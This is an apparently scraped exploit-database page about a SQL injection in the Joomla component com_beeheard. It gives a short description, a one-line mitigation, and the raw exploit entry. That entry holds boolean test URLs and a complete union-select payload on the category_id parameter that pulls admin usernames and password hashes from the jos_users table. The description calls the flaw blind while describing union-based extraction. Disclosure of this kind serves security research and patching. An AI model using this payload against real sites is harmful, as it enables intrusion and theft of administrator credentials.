header-logo
Suggest Exploit
vendor:
com_beeheard
by:
FL0RiX
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: com_beeheard
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Joomla Component com_beeheard Blind SQL injection Vulnerability

A Blind SQL injection vulnerability exists in the Joomla Component com_beeheard. An attacker can exploit this vulnerability to gain access to the admin login credentials. This can be done by sending a maliciously crafted HTTP request to the vulnerable server. The malicious request contains a SQL query that will return the username and password of the admin user. The malicious request is sent to the vulnerable server in the form of a URL. The URL contains a parameter called ‘category_id’ which is set to a value of ‘null’. This is followed by a ‘union’ statement which is used to concatenate the username and password of the admin user. The malicious request is then sent to the vulnerable server and the response will contain the username and password of the admin user.

Mitigation:

Input validation should be used to filter out malicious characters.
Source

Exploit-DB raw data:

[++] Joomla Component com_beeheard Blind SQL injection Vulnerability
[++] author : FL0RiX
[++] Name : com_beeheard
[++] Bug Type : (Blind) SQL Injection
[++] Infection : Admin login bilgileri alınabilir.
[++] Demo Vuln. :

TRUE(+)
» http://server/index.php?option=com_beeheard&controller=suggestions&view=suggestions&layout=list&category_id=2 and 1=1
FALSE(-)
» http://server/index.php?option=com_beeheard&controller=suggestions&view=suggestions&layout=list&category_id=2 and 1=0

[++] Bug Fix Advice : Zararlı karakterler filtrelenmelidir.



< ------------------- header data end of ------------------- >

< -- bug code start -- >

path/index.php?option=com_beeheard&controller=suggestions&view=suggestions&layout=list&category_id=null/**/and/**/1=0/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rixforever,5,6,7,8,9/**/from/**/jos_users--

< -- bug code end of -- >

Navigation

Suggest Exploit

Services By CQR